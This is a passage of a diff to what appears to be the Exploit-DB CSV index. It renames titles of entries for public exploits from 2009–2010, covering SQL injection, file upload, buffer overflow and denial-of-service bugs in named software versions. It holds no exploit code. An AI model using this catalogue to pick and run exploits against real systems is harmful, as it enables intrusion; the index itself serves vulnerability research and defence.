Buffer Overflow",2009-12-28,corelanc0d3r,windows,local,0 10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,php,webapps,0 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",php,webapps,0 -10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Remote File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH",2009-12-29,Lincoln,windows,remote,6660 +10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Arbitrary File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH Exploit",2009-12-29,Lincoln,windows,remote,6660 10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Download",2009-12-29,indoushka,asp,webapps,0 10770,platforms/asp/webapps/10770.txt,"PSnews - Database Download",2009-12-29,indoushka,asp,webapps,0 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download",2009-12-29,indoushka,asp,webapps,0 @@ -10073,12 +10074,12 @@ id,file,description,date,author,platform,type,port 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0 -10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass SQL Injection",2010-01-01,R3d-D3V!L,php,webapps,0 +10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass (SQL Injection)",2010-01-01,R3d-D3V!L,php,webapps,0 10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap (PoC)",2010-01-01,"D3V!L FUCKER",windows,dos,0 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service",2010-01-01,jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 -10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 +10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass (SQL Injection)",2010-01-02,R3d-D3V!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services (PoC)",2010-01-02,SarBoT511,windows,dos,0 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos,0 @@ -10092,7 +10093,7 @@ id,file,description,date,author,platform,type,port 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals - Local File Inclusion",2010-01-02,FL0RiX,php,webapps,0 10929,platforms/php/webapps/10929.txt,"WordPress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,php,webapps,0 -10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 +10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin",2010-01-02,d4rk-h4ck3r,php,webapps,0 10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0 10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,php,webapps,0 10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure",2010-01-03,LionTurk,asp,webapps,0 @@ -10127,7 +10128,7 @@ id,file,description,date,author,platform,type,port 10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour",2010-01-04,emgent,linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News - 'newsdetail.php' SQL Injection (2)",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 -10984,platforms/php/webapps/10984.txt,"Joomla Component com_cartikads 1.0 - Remote File Upload",2010-01-04,kaMtiEz,php,webapps,0 +10984,platforms/php/webapps/10984.txt,"Joomla Component com_cartikads 1.0 - Arbitrary File Upload",2010-01-04,kaMtiEz,php,webapps,0 10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - File Inclusion",2010-01-04,indoushka,php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects - Blind SQL Injection",2010-01-04,Pyske,php,webapps,0 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 @@ -10140,15 +10141,15 @@ id,file,description,date,author,platform,type,port 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - (view_news) SQL Injection",2010-01-06,Err0R,php,webapps,0 11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-06,"Zer0 Thunder",php,webapps,0 -11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload Exploit",2010-01-06,S2K9,php,webapps,0 +11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps,0 11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Download",2010-01-06,indoushka,asp,webapps,0 11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Download",2010-01-06,indoushka,asp,webapps,0 11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,php,webapps,0 11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Download",2010-01-06,indoushka,asp,webapps,0 -11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 +11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0 @@ -10213,16 +10214,16 @@ id,file,description,date,author,platform,type,port 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows/x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,"ALTBTA ",php,webapps,0 -11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 +11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service",2010-01-12,mr_me,ios,dos,8080 11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0 -11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow Denial of Service (PoC)",2010-01-13,"Julien Bedard",hardware,dos,2121 +11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow (Denial of Service) (PoC)",2010-01-13,"Julien Bedard",hardware,dos,2121 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80 11130,platforms/windows/dos/11130.pl,"Ofilter Player - (skin.ini) Local Crash (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,windows,dos,0 -11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service (Denial of Service)",2010-01-13,"Rehan Ahmed",windows,dos,0 +11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service",2010-01-13,"Rehan Ahmed",windows,dos,0 11133,platforms/windows/dos/11133.pl,"NPlayer - (.dat Skin) Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Download",2010-01-13,indoushka,asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 @@ -10232,8 +10233,8 @@ id,file,description,date,author,platform,type,port 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,php,webapps,0 11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc)",2010-01-15,Dr_IDE,multiple,dos,0 -11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite (PoC)",2010-01-15,Darkb0x,windows,dos,0 -11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite",2010-01-15,"Mert SARICA",windows,local,0 +11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - Overwrite (SEH) (PoC)",2010-01-15,Darkb0x,windows,dos,0 +11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0 11147,platforms/php/webapps/11147.txt,"Max's File Uploader - Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 @@ -10241,17 +10242,17 @@ id,file,description,date,author,platform,type,port 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0 -11155,platforms/php/webapps/11155.txt,"Transload Script - Upload",2010-01-16,DigitALL,php,webapps,0 +11155,platforms/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,php,webapps,0 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusion",2010-01-16,"cr4wl3r ",php,webapps,0 -11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 -11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 +11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass",2010-01-16,"cr4wl3r ",php,webapps,0 +11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass",2010-01-16,"cr4wl3r ",php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum - (layout) Local File Inclusion",2010-01-16,"cr4wl3r ",php,webapps,0 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH)",2010-01-16,Red-D3v1L,windows,local,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11164,platforms/php/webapps/11164.txt,"Ebay Clone from clone2009 - SQL Injection",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 -11165,platforms/windows/dos/11165.pl,"MediaMonkey Player - Local Denial of Service (Denial of Service)",2010-01-17,Red-D3v1L,windows,dos,0 -11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Upload",2010-01-17,Stink',php,webapps,0 +11165,platforms/windows/dos/11165.pl,"MediaMonkey Player - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0 +11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload",2010-01-17,Stink',php,webapps,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11168,platforms/php/webapps/11168.txt,"Joomla Component com_pc - Local File Inclusion",2010-01-17,Pyske,php,webapps,0 11169,platforms/php/webapps/11169.txt,"Max's Image Uploader - Arbitrary File Upload",2010-01-17,indoushka,php,webapps,0 @@ -10263,7 +10264,7 @@ id,file,description,date,author,platform,type,port 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime - Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros - SQL Injection",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - Buffer Overflow",2010-01-18,"John Babio",windows,remote,0 -11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service (Denial of Service)",2010-01-18,Red-D3v1L,windows,dos,0 +11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilities",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps,0 @@ -10278,14 +10279,14 @@ id,file,description,date,author,platform,type,port 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - '.smi' Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos,0 -11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 +11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass",2010-01-19,"cr4wl3r ",php,webapps,0 11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader - '.m3u' Buffer Overflow (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,"cr4wl3r ",windows,local,0 -11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic '.asx' - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 +11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic '.asx' - Local Crash",2010-01-21,"cr4wl3r ",windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat Server - Universal Buffer Overflow SEH (Metasploit)",2010-01-21,fb1h2s,windows,remote,0 11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0 @@ -10294,9 +10295,9 @@ id,file,description,date,author,platform,type,port 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos,0 -11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 +11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 -11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 +11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - Remote Buffer Overflow (SEH)",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) - SQL Injection",2010-01-22,snakespc,php,webapps,0 11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic ",php,webapps,0 @@ -10304,9 +10305,9 @@ id,file,description,date,author,platform,type,port 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies - SQL Injection",2010-01-22,snakespc,php,webapps,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 -11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin User)",2010-01-22,Stack,windows,local,0 +11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - shdrv.sys Local kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 -11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 +11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps,0 11236,platforms/php/webapps/11236.txt,"Joomla Component com_ContentBlogList - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps,0 @@ -10319,12 +10320,12 @@ id,file,description,date,author,platform,type,port 11245,platforms/windows/dos/11245.txt,"Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 -11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload",2010-01-24,alnjm33,php,webapps,0 +11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0 11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote,0 -11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 +11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Arbitrary File Upload",2010-01-26,indoushka,php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 - connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0 @@ -10332,13 +10333,13 @@ id,file,description,date,author,platform,type,port 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,"cr4wl3r ",windows,dos,0 11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,"cr4wl3r ",windows,dos,0 -11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0 +11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0 11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 -11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite",2010-01-27,tecnik,windows,remote,0 +11272,platforms/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,windows,remote,0 11273,platforms/ios/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote Denial of Service",2010-01-27,mr_me,ios,dos,0 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0 -11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 - NULL pointer crashes",2010-01-20,Skylined,windows,dos,0 +11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 - Null Pointer crashes",2010-01-20,Skylined,windows,dos,0 11277,platforms/php/webapps/11277.txt,"Joomla Component com_ccnewsletter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0 11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0 11279,platforms/php/webapps/11279.txt,"Joomla Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 @@ -10353,7 +10354,7 @@ id,file,description,date,author,platform,type,port 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0 11291,platforms/hardware/dos/11291.txt,"Xerox Workcenter 4150 - Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos,0 11292,platforms/php/webapps/11292.txt,"Joomla Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0 -11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow Exploit",2010-01-30,Dz_attacker,windows,remote,0 +11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,windows,remote,0 11294,platforms/php/webapps/11294.txt,"Joomla Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,"AtT4CKxT3rR0r1ST ",php,webapps,0 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10370,7 +10371,7 @@ id,file,description,date,author,platform,type,port 11309,platforms/php/webapps/11309.txt,"Snif 1.5.2 - Any Filetype Download Exploit",2010-02-01,Aodrulez,php,webapps,0 11310,platforms/asp/webapps/11310.txt,"RaakCMS - Multiple Vulnerabilities",2010-02-01,"Pouya Daneshmand",asp,webapps,0 11311,platforms/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)",2010-02-01,The.Morpheus,php,webapps,0 -11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow Exploit",2010-02-02,mr_me,windows,local,0 +11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,php,webapps,0 11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,windows,local,0 @@ -10393,9 +10394,9 @@ id,file,description,date,author,platform,type,port 11334,platforms/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection",2010-02-05,kaMtiEz,php,webapps,0 11336,platforms/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injection",2010-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla (com_photoblog) - Blind SQL Injection",2010-02-06,"ALTBTA ",php,webapps,0 -11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory Corruption Heap Buffer Overflow Exploit",2010-02-06,TecR0c,windows,dos,0 